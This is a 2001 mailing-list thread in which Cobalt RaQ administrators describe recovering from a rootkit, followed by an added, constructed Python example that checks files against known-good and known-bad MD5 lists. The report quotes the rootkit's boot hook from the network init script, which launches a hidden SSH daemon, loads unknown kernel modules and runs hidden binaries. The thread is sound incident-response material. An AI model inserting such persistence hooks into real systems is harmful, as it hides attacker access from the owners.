
Re: [cobalt-users] Recent Hacks (resolution in sight)



I was also hacked... Could you send me that Perl file? I went through and found that mysql was replaced, but I don't know what else was, and I keep getting a message from cron saying that there was an error starting sshd. I noticed that ls and ps seemed to be replaced, and my FTP server was replaced. I got rid of all that stuff, and I moved bash and replaced it. Any help you could give me would be great, and I am glad to help you if I can.

David Conorozzo
PC Assistance, Inc.


>>> "inc" <inc@xxxxxxxxxxxxx> 02/09/01 07:34AM >>>

thanks to those who maintained email with me today; it's been a great help.

here's my report:


i've successfully (touch wood) used the unhack.pl script recommended by
Steve Bassi via Mike Fritsch.

after running unhack.pl, there's one file that unhack said was neither
hacked (according to its internal MD5 checksums) nor "original" cobalt.

this file, /etc/rc.d/init.d/network, contains the following, which i would say
is part of the hack.

        /usr/bin/ssh2d -q
        if test -f "/dev/kmod"; then
        /sbin/insmod -f /usr/lib/crth.o
        /sbin/insmod -f /usr/lib/crtz.o
        fi
        if test -f /lib/security/.config/sn ; then
        cd /lib/security/.config;./lpsched
        fi
        touch /var/lock/subsys/network
        if test -f "/dev/dos"; then
        /usr/lib/lpq
        fi
        ;;


i've not installed ssh2d, and crth.o and crtz.o look damned nasty to me.
note that unhack.pl DOESN'T clear up crtz.o.  can anyone shed some light on
the remaining commands there?  i've disabled all these lines until i know
what they are.  my "network" script was considerably more complicated than
the "network" script included with unhack.tar.gz.

i also spent the whole day studying up on cracking and studying the scripts
and binaries that were placed on my raq.

the only weird thing i could find in my logs was an ftp login from korea.  i
have not published any ftp site urls anywhere, and this is the only ftp
login i've ever seen in the logs apart from my own, and the 127.0.0.1
entries used by the admin.  this ftp login occurred 4 hours before the
rootkit was activated.

so i would think that proftpd was exploited to gain root access.

all log entries bar the ftp one above were cleaned up, but there were
footsteps left behind in /.bash_history which reflected an rcp download from
a us .edu site.

at this point ps, su, and all manner of executables are replaced to hide any
unusual activity.  flash22 suggested i try "top" -- which, lo and behold,
turned up all my logins running as "/bin/xlogin" -- which appeared to be a
copy of the original cobalt "/bin/login".  a file, /etc/ld.so.hash, seems to
have a crypted password in it.  the replaced "/bin/login" was a very small
file next to the original cobalt "/bin/login".


i'm happy to answer any questions on this.

thanks again to those who helped me climb out of the black hole!


--
chris paul
fastmedia.net




_______________________________________________
cobalt-users mailing list
cobalt-users@xxxxxxxxxxxxxxx 
To Subscribe or Unsubscribe, please go to:
http://list.cobalt.com/mailman/listinfo/cobalt-users
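Added illustration, not code from this thread, from unhack.pl, or from Cobalt: the three-way verdict chris describes above (a file is "original" if its MD5 matches the pristine distribution binary, "hacked" if it matches a rootkit replacement seen before, and otherwise neither, which is what happened with his /etc/rc.d/init.d/network) written out as a small Python checker. The manifest format (md5sum's "digest  path" lines), the paths, the file contents and every hash in it are constructed for the example; a real manifest would come from a pristine install or the vendor. The check only catches what is on one of the two lists, so the "unknown" and "missing" buckets are the ones that need a person to look, exactly as with the modified network script. One caveat a responder would add: on a box where ls, ps, su and login have already been swapped, the interpreter, libc and md5sum may have been too, so run any such check from a boot disk or trusted media, not from the compromised install.

```python
"""Three-way classification of files against known-good and known-bad MD5 lists.

Added example (not unhack.pl, not Cobalt's data). Every manifest, path and
hash below is constructed for illustration.
"""
import hashlib
import os
import tempfile


def md5_file(path):
    """Stream a file through MD5 and return the hex digest."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_manifest(text):
    """Parse 'digest  relative/path' lines (the layout md5sum prints) into
    {path: digest}. Blank lines and '#' comments are skipped."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, path = line.partition("  ")
        entries[path.strip()] = digest.strip().lower()
    return entries


def classify(path, root, known_good, known_bad):
    """Return (verdict, digest) for one manifest path under `root`.

    known_good maps path -> digest of the pristine file for that path.
    known_bad is a set of digests only, because a trojan may be dropped
    under any name (the thread's /bin/xlogin was a relocated copy of login).
    """
    full = os.path.join(root, path)
    if not os.path.isfile(full):
        return "missing", None
    digest = md5_file(full)
    if digest == known_good.get(path):
        return "original", digest
    if digest in known_bad:
        return "hacked", digest
    return "unknown", digest  # neither list: needs a human, as with the network script


def scan(root, known_good, known_bad):
    """Classify every path the known-good manifest lists."""
    return {p: classify(p, root, known_good, known_bad)[0] for p in sorted(known_good)}


# --- constructed demo data (stand-ins, not real binaries) ---
ORIGINAL_LS = b"#!/bin/sh\n# pristine ls stand-in\n"
ORIGINAL_PS = b"#!/bin/sh\n# pristine ps stand-in\n"
ORIGINAL_LOGIN = b"#!/bin/sh\n# pristine login stand-in\n"
ORIGINAL_NETWORK = b"#!/bin/sh\n# pristine network init script stand-in\n"
TROJAN_PS = b"#!/bin/sh\n# rootkit ps stand-in\n"
MODIFIED_NETWORK = ORIGINAL_NETWORK + b"/usr/bin/ssh2d -q\n"  # locally edited, on no list


def demo_manifests():
    """Build a hypothetical known-good manifest and known-bad digest set."""
    pristine = [
        ("bin/ls", ORIGINAL_LS),
        ("bin/ps", ORIGINAL_PS),
        ("bin/login", ORIGINAL_LOGIN),
        ("etc/rc.d/init.d/network", ORIGINAL_NETWORK),
    ]
    good_text = "\n".join(f"{hashlib.md5(d).hexdigest()}  {p}" for p, d in pristine)
    known_bad = {hashlib.md5(TROJAN_PS).hexdigest()}
    return parse_manifest(good_text), known_bad


def build_demo_tree(root):
    """Lay out a fake filesystem: ls untouched, ps replaced by the known
    trojan, network script edited, login deleted entirely."""
    files = {
        "bin/ls": ORIGINAL_LS,
        "bin/ps": TROJAN_PS,
        "etc/rc.d/init.d/network": MODIFIED_NETWORK,
    }
    for rel, data in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)


def run_demo():
    """Run the scan over the constructed tree and return {path: verdict}."""
    known_good, known_bad = demo_manifests()
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return scan(root, known_good, known_bad)


if __name__ == "__main__":
    for path, verdict in run_demo().items():
        print(f"{verdict:9} {path}")
```

Run it and the four verdicts come out as original (bin/ls), hacked (bin/ps), unknown (the edited network script) and missing (bin/login); only the first is safe to ignore. The verdict order is deliberate: a file is compared against its own pristine digest before the rootkit list, so the rootkit list needs no path information and can be shared between hosts.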